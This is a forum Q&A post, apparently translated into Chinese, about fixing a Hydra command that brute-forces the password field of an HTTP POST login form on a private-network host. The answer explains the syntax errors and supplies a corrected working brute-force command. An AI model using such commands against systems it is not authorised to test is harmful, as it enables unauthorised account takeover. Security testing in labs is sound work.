hydra http://192.168.0.24:1234/ http-form-post "/password=^PASS^:Invalid password!" -P pass.txt -t 10 -o hydra-http-post-attack.txt
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 12:12:37
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: Invalid password!
我不确定为什么会出现错误,因为有字符串^PASS^
。应用程序上没有用户名。
登录表单的完整 URL 是:http://192.168.0.24:1234/
有人可以帮忙吗?
答案1
关于您的问题:
- 当使用 hydra 时,不需要将其放在
http://
要攻击的主机前面。 - 要指定端口,请使用
-s
标志。 - 您需要指定
-l
标志,否则会出现错误。 - 在 POST 请求中,您必须指定将接收 POST 请求的文件(例如 index.php、password.php、validate.php 等)
- 最后,但并非最不重要的一点是,您必须指定成功案例或失败案例。
尝试以下命令,这是我根据提供的信息能做的最好的事情:
hydra -l '' -P pass.txt 192.168.0.24 -s 1234 http-post-form "/index.php:pass=^PASS^:F=Invalid Password!" -t 10 -o hydra-http-post-attack.txt
我自己尝试过并且它没有产生任何错误。
祝你好运!